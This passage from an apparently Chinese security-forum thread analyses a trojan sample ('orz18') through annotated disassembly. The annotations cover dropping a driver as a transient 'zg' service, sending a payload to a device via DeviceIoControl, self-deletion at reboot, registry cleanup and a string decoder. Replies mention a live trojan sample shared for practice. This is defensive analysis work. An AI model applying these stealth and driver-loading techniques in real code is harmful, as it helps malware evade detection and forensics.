00416067 |.FF15 24114000call dword ptr ds: ; \MessageBoxA ; blocks until the box is dismissed
0041606D |.56 push esi ; /pThreadId => NULL
0041606E |.56 push esi ; |CreationFlags => 0
0041606F |.56 push esi ; |pThreadParm => NULL
00416070 |.68 30574100 push orz18.00415730 ; |ThreadFunction = orz18.00415730
00416075 |.56 push esi ; |StackSize => 0
00416076 |.56 push esi ; |pSecurity => NULL
00416077 |.FF15 34104000call dword ptr ds: ; \CreateThread ; handle is discarded
0041607D |.6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
0041607F |.8D85 F8FEFFFFlea eax,dword ptr ss: ; |
00416085 |.56 push esi ; |NewName => NULL ; NULL target + DELAY_UNTIL_REBOOT = delete own file at reboot
00416086 |.50 push eax ; |ExistingName
00416087 |.FF15 50104000call dword ptr ds: ; \MoveFileExA
0041608D |.E8 DEFAFFFF call orz18.00415B70 ; not shown in this listing
00416092 |.68 48644100 push orz18.00416448 ;ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1696"
00416097 |.E8 34FFFFFF call orz18.00415FD0 ; install/start service "zg" from that file, then clean up (section 26)
0041609C |.59 pop ecx
0041609D |.56 push esi ; /hTemplateFile => NULL
0041609E |.56 push esi ; |Attributes => 0
0041609F |.6A 03 push 3 ; |Mode = OPEN_EXISTING
004160A1 |.56 push esi ; |pSecurity => NULL
004160A2 |.56 push esi ; |ShareMode => 0
004160A3 |.68 00000080 push 80000000 ; |Access = GENERIC_READ
004160A8 |.68 CC434100 push orz18.004143CC ; |FileName = "\\.\safebreas"
004160AD |.FF15 A0104000call dword ptr ds: ; \CreateFileA — opens the "\\.\safebreas" device, which the author attributes to the 1696 driver
004160B3 |.8BF8 mov edi,eax
004160B5 |.83FF FF cmp edi,-1
004160B8 |.74 1D je short orz18.004160D7 ; open failed -> falls to CloseHandle with edi == INVALID_HANDLE_VALUE
004160BA |.8D45 FC lea eax,dword ptr ss:
004160BD |.56 push esi ; /pOverlapped => NULL
004160BE |.50 push eax ; |pBytesReturned
004160BF |.56 push esi ; |OutBufferSize => 0
004160C0 |.56 push esi ; |OutBuffer => NULL
004160C1 |.68 00320000 push 3200 ; |InBufferSize = 3200 (12800.)
004160C6 |.68 A4014100 push orz18.004101A4 ; |InBuffer = orz18.004101A4 ; static 12800-byte payload handed to the driver
004160CB |.68 1C002200 push 22001C ; |IoControlCode = 22001C ; = CTL_CODE(0x22 FILE_DEVICE_UNKNOWN, function 7, METHOD_BUFFERED, FILE_ANY_ACCESS)
004160D0 |.57 push edi ; |hDevice
004160D1 |.FF15 68104000call dword ptr ds: ; \DeviceIoControl ; return value is not checked
004160D7 |>57 push edi ; /hObject
004160D8 |.FF15 AC104000call dword ptr ds: ; \CloseHandle
004160DE |.5F pop edi
004160DF |.33C0 xor eax,eax ; always returns 0
004160E1 |.5E pop esi
004160E2 |.C9 leave
004160E3 \.C3 retn
}
26 尝试打开 zg 服务,如果失败,则新建一个叫 zg 的服务,指向创建的 1696 文件。并启动该服务
启动完成以后,立即删除该 1696 文件,并使用 SHDeleteKey 完全删除注册表项目:"SYSTEM\CurrentControlSet\Services\zg"
{
; sub_00415FD0(const char *driver_path) — author's section 26.
; In:  [ebp+8] = path of the dropped driver file ("...\Temp\1696" at the
;      visible call site 00416092/00416097).
; Flow:
;   handle = 00415C28("zg", path)   per the author: open the "zg" service and
;                                   create it on failure; 00415C28 is not listed
;   if handle != 0:
;       QueryServiceStatus(handle, &status)            status lives at [ebp-1C]
;       if query failed or status.dwCurrentState != SERVICE_RUNNING (4):
;           StartServiceA(handle, 0, NULL)
;       CloseServiceHandle(handle)
;   DeleteFileA(path)                                  removes the driver file
;   SHDeleteKeyA(HKLM, "SYSTEM\CurrentControlSet\Services\zg")   removes the service key
; Returns whatever SHDeleteKeyA left in eax (not normalised).
; Net effect: the driver gets started, then both its file and its service
; registration are removed right away, so the "zg" key and the temp file exist
; only briefly — service-control and file-creation events are the durable traces.
00415FD0 /$55 push ebp
00415FD1 |.8BEC mov ebp,esp
00415FD3 |.83EC 1C sub esp,1C ; 0x1C bytes = one SERVICE_STATUS at [ebp-1C]
00415FD6 |.56 push esi
00415FD7 |.FF75 08 push dword ptr ss: ; [ebp+8] = driver path
00415FDA |.68 C8434100 push orz18.004143C8 ;ASCII "zg"
00415FDF |.E8 44FCFFFF call orz18.00415C28 ; open-or-create service (author's description; body not shown)
00415FE4 |.8BF0 mov esi,eax ; esi = SC handle, 0 on failure
00415FE6 |.59 pop ecx
00415FE7 |.85F6 test esi,esi
00415FE9 |.59 pop ecx
00415FEA |.74 27 je short orz18.00416013 ; no handle -> still delete the file and the registry key
00415FEC |.8D45 E4 lea eax,dword ptr ss:
00415FEF |.50 push eax
00415FF0 |.56 push esi
00415FF1 |.FF15 08104000call dword ptr ds: ;ADVAPI32.QueryServiceStatus
00415FF7 |.85C0 test eax,eax
00415FF9 |.74 06 je short orz18.00416001 ; query failed -> try to start anyway
00415FFB |.837D E8 04 cmp dword ptr ss:,4 ; [ebp-18] = SERVICE_STATUS.dwCurrentState; 4 = SERVICE_RUNNING
00415FFF |.74 0B je short orz18.0041600C ; already running -> skip StartServiceA
00416001 |>6A 00 push 0
00416003 |.6A 00 push 0
00416005 |.56 push esi
00416006 |.FF15 04104000call dword ptr ds: ;ADVAPI32.StartServiceA ; result not checked
0041600C |>56 push esi
0041600D |.FF15 18104000call dword ptr ds: ;ADVAPI32.CloseServiceHandle
00416013 |>FF75 08 push dword ptr ss: ; /FileName
00416016 |.FF15 7C104000call dword ptr ds: ; \DeleteFileA ; drops the on-disk driver right after start
0041601C |.68 A0434100 push orz18.004143A0 ; /SubKey = "SYSTEM\CurrentControlSet\Services\zg"
00416021 |.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00416026 |.FF15 E8104000call dword ptr ds: ; \SHDeleteKeyA ; recursive delete of the service's registry entry
0041602C |.5E pop esi
0041602D |.C9 leave
0041602E \.C3 retn
}
数据还原
{
; In-place string decoder (the author's "data restore"). Only the loop is
; listed; the test that feeds the entry branch at 00414988 is not shown.
; Registers, recovered from the opcodes since the bracketed operands were lost
; in extraction: esi = string base, edx = index i, [edx+esi] = current byte.
; Per byte:
;     s[i] = s[i] + (uint8)((i - 0x3B) << 1)
; The loop bound is recomputed each iteration with an inline strlen over esi
; (repne scasb), so decoding stops early if a decoded byte becomes 0.
00414988 |. /74 1F je short orz18.004149A9 ; skip the loop entirely (condition set before this fragment)
0041498A |> |8A0C32 /mov cl,byte ptr ds: ; cl = [edx+esi]  (opcode 8A 0C 32)
0041498D |. |8AC2 |mov al,dl ; al = low byte of the index
0041498F |. |2C 3B |sub al,3B ; al = i - 0x3B
00414991 |. |8BFE |mov edi,esi ; edi = scan pointer for the strlen below
00414993 |. |D0E0 |shl al,1 ; al = (i - 0x3B) * 2, truncated to 8 bits
00414995 |. |02C8 |add cl,al ; decoded byte
00414997 |. |33C0 |xor eax,eax ; al = 0 = terminator sought by scasb
00414999 |. |880C32 |mov byte ptr ds:,cl ; [edx+esi] = cl  (opcode 88 0C 32)
0041499C |. |83C9 FF |or ecx,FFFFFFFF
0041499F |. |42 |inc edx ; i++
004149A0 |. |F2:AE |repne scas byte ptr es: ; inline strlen(esi): ecx counts down past the NUL
004149A2 |. |F7D1 |not ecx
004149A4 |. |49 |dec ecx ; ecx = strlen(esi)
004149A5 |. |3BD1 |cmp edx,ecx
004149A7 |.^|72 E1 \jb short orz18.0041498A ; continue while i < current length
}
新手请体谅 完全不懂
没有试炼品么 :)我也是看不懂,膜拜 作者提供的网盘里有木马试炼~ 学习实践,外加顶帖 :funk:
膜拜啊!!!
还有这个病毒居然加了模拟点击……
汗哒哒 眼睛一直花起的,看起脑壳痛 这个就是传说中的猫癣3代啊~~ 要是能来点释放出来的SYS分析就好了:) 学习了一派内好帖子,就是看不懂啊!!!